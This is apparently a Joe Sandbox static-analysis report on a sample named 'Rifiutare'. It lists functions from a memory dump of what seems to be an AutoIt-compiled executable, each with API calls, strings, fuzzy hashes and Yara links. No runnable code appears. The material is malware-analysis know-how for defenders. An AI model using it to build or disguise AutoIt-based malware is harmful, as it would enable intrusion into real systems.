Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 203e2dc94e8935df9c214e00186cad434219d8f7485604d77c4ce924ed064a5f
Instruction ID: 92a7be964da3c139ae4764b197764352db1c30db58d17cfa10c866ef11cdca82
Opcode Fuzzy Hash: 203e2dc94e8935df9c214e00186cad434219d8f7485604d77c4ce924ed064a5f
Instruction Fuzzy Hash: AEB14A71A0120A9FDF14DFA8DC49FAE7BB4FB48315F108229FA1AA7290D7749A40DF51

Function 00C91605 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C91973: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C9198E
Part of subcall function 00C91973: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C91415,?,?,?), ref: 00C9199A
Part of subcall function 00C91973: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C91415,?,?,?), ref: 00C919A9
Part of subcall function 00C91973: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C91415,?,?,?), ref: 00C919B0
Part of subcall function 00C91973: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C919C7

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C9166F
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C916A3
GetLengthSid.ADVAPI32(?), ref: 00C916BA
GetAce.ADVAPI32(?,00000000,?), ref: 00C916F4
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C91710
GetLengthSid.ADVAPI32(?), ref: 00C91727
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C9172F
HeapAlloc.KERNEL32(00000000), ref: 00C91736
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C91757
CopySid.ADVAPI32(00000000), ref: 00C9175E
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C9178D
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C917AF
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C917C1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C917E8
HeapFree.KERNEL32(00000000), ref: 00C917EF
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C917F8
HeapFree.KERNEL32(00000000), ref: 00C917FF
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C91808
HeapFree.KERNEL32(00000000), ref: 00C9180F
GetProcessHeap.KERNEL32(00000000,?), ref: 00C9181B
HeapFree.KERNEL32(00000000), ref: 00C91822

Part of subcall function 00C91A0D: GetProcessHeap.KERNEL32(00000008,00C9142B,?,00000000,?,00C9142B,?), ref: 00C91A1B
Part of subcall function 00C91A0D: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C9142B,?), ref: 00C91A22
Part of subcall function 00C91A0D: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C9142B,?), ref: 00C91A31

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 2ea4ee4ce84ac39843c3dc47e6f5ad956805c8f74271e988431e1ea3671c2785
Instruction ID: 1b244baad6a196c85d9e58737709878c12af5e98c54369cfd45d8bdc6ceb484c
Opcode Fuzzy Hash: 2ea4ee4ce84ac39843c3dc47e6f5ad956805c8f74271e988431e1ea3671c2785
Instruction Fuzzy Hash: A7715AB690020AABDF11DFA5DC4AFEEBBB8BF04310F194125F926A6190D7319A05CB60

Function 00CBCB3A Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CBCC40
RegCreateKeyExW.ADVAPI32(?,?,00000000,00CCDBF4,00000000,?,00000000,?,?), ref: 00CBCCC7
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00CBCD27
_wcslen.LIBCMT ref: 00CBCD77
_wcslen.LIBCMT ref: 00CBCDF2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00CBCE35
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00CBCF44
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00CBCFD0
RegCloseKey.ADVAPI32(?), ref: 00CBD004
RegCloseKey.ADVAPI32(00000000), ref: 00CBD011
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00CBD0E3

Strings

REG_QWORD, xrefs: 00CBD046
REG_BINARY, xrefs: 00CBD096
REG_MULTI_SZ, xrefs: 00CBCE78
REG_DWORD, xrefs: 00CBCF87
REG_EXPAND_SZ, xrefs: 00CBCD50
REG_SZ, xrefs: 00CBCDC7

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: a324a0c1db62e3cb6ecc8df5f93b9ee8937a2c5d90a2c18f503cc4e21bd70dba
Instruction ID: 84f6d3b14b9751db61245e5b991633348c6b36b6ffd61e82f4e47cf30a46202f
Opcode Fuzzy Hash: a324a0c1db62e3cb6ecc8df5f93b9ee8937a2c5d90a2c18f503cc4e21bd70dba
Instruction Fuzzy Hash: 34125A352042019FDB14DF14C881B6ABBE5FF88724F15849DF89AAB3A2DB31ED41DB81

Function 00CC1034 Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00CC10DC
_wcslen.LIBCMT ref: 00CC1117
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CC116A
_wcslen.LIBCMT ref: 00CC11A0
_wcslen.LIBCMT ref: 00CC121C
_wcslen.LIBCMT ref: 00CC1297

Part of subcall function 00C4FE52: _wcslen.LIBCMT ref: 00C4FE5D

Part of subcall function 00C933F3: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C93405

Strings

COLLAPSE, xrefs: 00CC1217, 00CC1232
EXISTS, xrefs: 00CC1292, 00CC12AD
EXPAND, xrefs: 00CC130E
SELECT, xrefs: 00CC1427
GETITEMCOUNT, xrefs: 00CC1334
GETTOTALCOUNT, xrefs: 00CC1108, 00CC112D
GETTEXT, xrefs: 00CC13AD
ISCHECKED, xrefs: 00CC13F7
UNCHECK, xrefs: 00CC1454
CHECK, xrefs: 00CC119B, 00CC11B6
GETSELECTED, xrefs: 00CC1364

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: df7c42ba386c9d13c98293736682dc122ea6c9e2153ec228a5ff48501874c0a9
Instruction ID: bd49380cd773268e9902161be158736af58ff1d0fe6fe9d1c6501d24be4564bb
Opcode Fuzzy Hash: df7c42ba386c9d13c98293736682dc122ea6c9e2153ec228a5ff48501874c0a9
Instruction Fuzzy Hash: 9FE1AD352083418FCB14DF26C490E2AB7E1BF86754F09495DF8A69B7A2CB30EE45DB81

Function 00CBD11B Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 240COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CBBE2E,?,?), ref: 00CBD138
_wcslen.LIBCMT ref: 00CBD174
_wcslen.LIBCMT ref: 00CBD1E2
_wcslen.LIBCMT ref: 00CBD218
_wcslen.LIBCMT ref: 00CBD273
_wcslen.LIBCMT ref: 00CBD2A9
_wcslen.LIBCMT ref: 00CBD2F9

Strings

HKEY_CURRENT_USER, xrefs: 00CBD337
HKEY_CLASSES_ROOT, xrefs: 00CBD26D, 00CBD272
HKEY_USERS, xrefs: 00CBD359
HKLM, xrefs: 00CBD212, 00CBD217
HKU, xrefs: 00CBD36A
HKCU, xrefs: 00CBD348
HKCR, xrefs: 00CBD2A3, 00CBD2A8
HKCC, xrefs: 00CBD326
HKEY_LOCAL_MACHINE, xrefs: 00CBD1DC, 00CBD1E1
HKEY_CURRENT_CONFIG, xrefs: 00CBD2F3, 00CBD2F8

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: c28a944b5f1b73f76943b258dafe5a76d2b1f83f30d30a9c169c905e52b1b898
Instruction ID: 322092a2f8e765db8871408b19c04b1ff591ba0847508d90ec9da2cbe27feafd
Opcode Fuzzy Hash: c28a944b5f1b73f76943b258dafe5a76d2b1f83f30d30a9c169c905e52b1b898
Instruction Fuzzy Hash: 0D71E23260016A8BCF109E7CCD515FE33A5AF64724F210529FC7797296FA35CE859362

Function 00CC8944 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00CC8962
_wcslen.LIBCMT ref: 00CC8976
_wcslen.LIBCMT ref: 00CC8999
_wcslen.LIBCMT ref: 00CC89BC
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00CC89FA
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00CC3CF4,?), ref: 00CC8A56
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CC8A8F
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00CC8AD2
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CC8B09
FreeLibrary.KERNEL32(?), ref: 00CC8B15
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00CC8B25
DestroyIcon.USER32(?), ref: 00CC8B34
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00CC8B51
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00CC8B5D

Strings

.exe, xrefs: 00CC8990
.icl, xrefs: 00CC8970
.dll, xrefs: 00CC89B3

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 3cf45ff7e19bf8f35a1f9610a8740c6dde013ae38cf182c7dca9e6e4ec88fa8f
Instruction ID: 3bf8793a13f4f50638a8fa620b47302af1bc74d705f576abf7d92ff53116b28a
Opcode Fuzzy Hash: 3cf45ff7e19bf8f35a1f9610a8740c6dde013ae38cf182c7dca9e6e4ec88fa8f
Instruction Fuzzy Hash: 6E61BFB1500219BBEB14DB64CC81FBF77A8FB08711F10411AF926D60D1DB74AE98DBA0

Function 00CA4790 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00CA480F
_wcslen.LIBCMT ref: 00CA481A
_wcslen.LIBCMT ref: 00CA4871
_wcslen.LIBCMT ref: 00CA48AF
GetDriveTypeW.KERNEL32(?), ref: 00CA48ED
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CA4935
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CA4970
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CA499E

Strings

open, xrefs: 00CA486B, 00CA4870
closed, xrefs: 00CA481F, 00CA4844, 00CA485D, 00CA4895, 00CA48AE
set cd door , xrefs: 00CA493F
open , xrefs: 00CA48FC
type cdaudio alias cd wait, xrefs: 00CA4918
wait, xrefs: 00CA495B
close, xrefs: 00CA4815, 00CA482F
close cd wait, xrefs: 00CA4989

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: SendString_wcslen$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1839972693-4113822522
Opcode ID: 36b2073b4a5c0febd38914f9e36fb81f7ad9e3d457cef5aa6785cb301197aa27
Instruction ID: b3dbf261e211674bef40ea65258f5df419e97e08a68c794b4500533b725d08ce
Opcode Fuzzy Hash: 36b2073b4a5c0febd38914f9e36fb81f7ad9e3d457cef5aa6785cb301197aa27
Instruction Fuzzy Hash: 4F7100715083068FC314EF34D88196BB7E8EF95758F004A2DF8A693291EB74EE45CB92

Function 00C96237 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00C9624A
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C9625C
SetWindowTextW.USER32(?,?), ref: 00C96273
GetDlgItem.USER32(?,000003EA), ref: 00C96288
SetWindowTextW.USER32(00000000,?), ref: 00C9628E
GetDlgItem.USER32(?,000003E9), ref: 00C9629E
SetWindowTextW.USER32(00000000,?), ref: 00C962A4
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00C962C5
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00C962DF
GetWindowRect.USER32(?,?), ref: 00C962E8
_wcslen.LIBCMT ref: 00C9634F
SetWindowTextW.USER32(?,?), ref: 00C9638B
GetDesktopWindow.USER32 ref: 00C96391
GetWindowRect.USER32(00000000), ref: 00C96398
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00C963EF
GetClientRect.USER32(?,?), ref: 00C963FC
PostMessageW.USER32(?,00000005,00000000,?), ref: 00C96421
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00C9644B

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: b6755a9aab341e4f1f452cbd735aac8719d2bbdbb188f27e60bf40cc77d7cf8b
Instruction ID: 58d2e33f98296f25689f3f977f278a0cf65f9af176d90a5d5dce0cd075dcd38a
Opcode Fuzzy Hash: b6755a9aab341e4f1f452cbd735aac8719d2bbdbb188f27e60bf40cc77d7cf8b
Instruction Fuzzy Hash: 1E717B71900705AFDF20DFA9CE49FAEBBF5FB48704F100928E596A26A0D775EA44CB50

Function 00CB0654 Relevance: 27.1, APIs: 18, Instructions: 128COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00CB066D
LoadCursorW.USER32(00000000,00007F8A), ref: 00CB0678
LoadCursorW.USER32(00000000,00007F00), ref: 00CB0683
LoadCursorW.USER32(00000000,00007F03), ref: 00CB068E
LoadCursorW.USER32(00000000,00007F8B), ref: 00CB0699
LoadCursorW.USER32(00000000,00007F01), ref: 00CB06A4
LoadCursorW.USER32(00000000,00007F81), ref: 00CB06AF
LoadCursorW.USER32(00000000,00007F88), ref: 00CB06BA
LoadCursorW.USER32(00000000,00007F80), ref: 00CB06C5
LoadCursorW.USER32(00000000,00007F86), ref: 00CB06D0
LoadCursorW.USER32(00000000,00007F83), ref: 00CB06DB
LoadCursorW.USER32(00000000,00007F85), ref: 00CB06E6
LoadCursorW.USER32(00000000,00007F82), ref: 00CB06F1
LoadCursorW.USER32(00000000,00007F84), ref: 00CB06FC
LoadCursorW.USER32(00000000,00007F04), ref: 00CB0707
LoadCursorW.USER32(00000000,00007F02), ref: 00CB0712
GetCursorInfo.USER32(?), ref: 00CB0722
GetLastError.KERNEL32 ref: 00CB0764

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 35d7e0f91d97c85a68eac05fb5ad7010695f3426e090dfa6f37364913fcc1410
Instruction ID: e414ced07b337e86a862e7fc2d1e39f99e116d3be151f2ba688451cda7c7c277
Opcode Fuzzy Hash: 35d7e0f91d97c85a68eac05fb5ad7010695f3426e090dfa6f37364913fcc1410
Instruction Fuzzy Hash: 204151B0D043196ADB109FBA8C89D6EBFE8FF04354F54452AE11DE7291DA78A9018F91

Function 00C504E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00C504E6

Part of subcall function 00C5050D: InitializeCriticalSectionAndSpinCount.KERNEL32(00D016FC,00000FA0,1F7E7C57,?,?,?,?,00C727D3,000000FF), ref: 00C5053C
Part of subcall function 00C5050D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00C727D3,000000FF), ref: 00C50547
Part of subcall function 00C5050D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00C727D3,000000FF), ref: 00C50558
Part of subcall function 00C5050D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00C5056E
Part of subcall function 00C5050D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00C5057C
Part of subcall function 00C5050D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00C5058A
Part of subcall function 00C5050D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00C505B5
Part of subcall function 00C5050D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00C505C0

___scrt_fastfail.LIBCMT ref: 00C50507

Part of subcall function 00C504C3: __onexit.LIBCMT ref: 00C504C9

Strings

SleepConditionVariableCS, xrefs: 00C50574
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00C50542
WakeAllConditionVariable, xrefs: 00C50582
kernel32.dll, xrefs: 00C50553
InitializeConditionVariable, xrefs: 00C50568

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 69d5e40a6e6dfbbed80791b1d94d545a42c2052c1aa80fb8a507aac973d10a4b
Instruction ID: cbd2bf652ea7bb08c6e56c252928cc18f0d38b6ff69312a4ce5589a6e9761bfa
Opcode Fuzzy Hash: 69d5e40a6e6dfbbed80791b1d94d545a42c2052c1aa80fb8a507aac973d10a4b
Instruction Fuzzy Hash: 1321293A641700AFD7112BA8DC06F6E3794EB04B62F34013AFD16D32D0EB7099848AAC

Function 00CA4DD7 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,00CCDBF4), ref: 00CA4E3E
_wcslen.LIBCMT ref: 00CA4E52
_wcslen.LIBCMT ref: 00CA4EB0
_wcslen.LIBCMT ref: 00CA4F0B
_wcslen.LIBCMT ref: 00CA4F56
_wcslen.LIBCMT ref: 00CA4FBE

Part of subcall function 00C4FE52: _wcslen.LIBCMT ref: 00C4FE5D

GetDriveTypeW.KERNEL32(?,00CF7BD0,00000061), ref: 00CA505A

Strings

unknown, xrefs: 00CA501F
removable, xrefs: 00CA4F01, 00CA4F06
fixed, xrefs: 00CA4F4C, 00CA4F51
cdrom, xrefs: 00CA4EA6, 00CA4EAB
ramdisk, xrefs: 00CA5008
network, xrefs: 00CA4FB4, 00CA4FB9
all, xrefs: 00CA4E48, 00CA4E4D

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: d64d956c4c84b23a4b80089f1b943154115c94facd828ed60ef24d3f1e3a5dcb
Instruction ID: 9b868048790331f755946992993d3b5b0f0568aa3c851f632661f0b2d428af0d
Opcode Fuzzy Hash: d64d956c4c84b23a4b80089f1b943154115c94facd828ed60ef24d3f1e3a5dcb
Instruction Fuzzy Hash: 3AB1D0316083029FC714DF28C890A7EB7E5BF96728F50891DF9A687292D770D985CB92

Function 00CB47BC Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00CCDBF4), ref: 00CB488E
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00CB48A0
GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00CCDBF4), ref: 00CB48C5
FreeLibrary.KERNEL32(00000000,?,00CCDBF4), ref: 00CB4911
StringFromGUID2.OLE32(?,?,00000028,?,00CCDBF4), ref: 00CB497B
SysFreeString.OLEAUT32(00000009), ref: 00CB4A35
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00CB4A9B
SysFreeString.OLEAUT32(?), ref: 00CB4AC5

Strings

GetModuleHandleExW, xrefs: 00CB489A
kernel32.dll, xrefs: 00CB4889

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 354098117-199464113
Opcode ID: a56360c293c7abef7a00adff19887bb4fea162358cae815063eea28a6dbe1ba2
Instruction ID: bbadbccfc3b3e53cc9f852682bf0b70863d55af13a7f6e0bac4a3b9cea76b78f
Opcode Fuzzy Hash: a56360c293c7abef7a00adff19887bb4fea162358cae815063eea28a6dbe1ba2
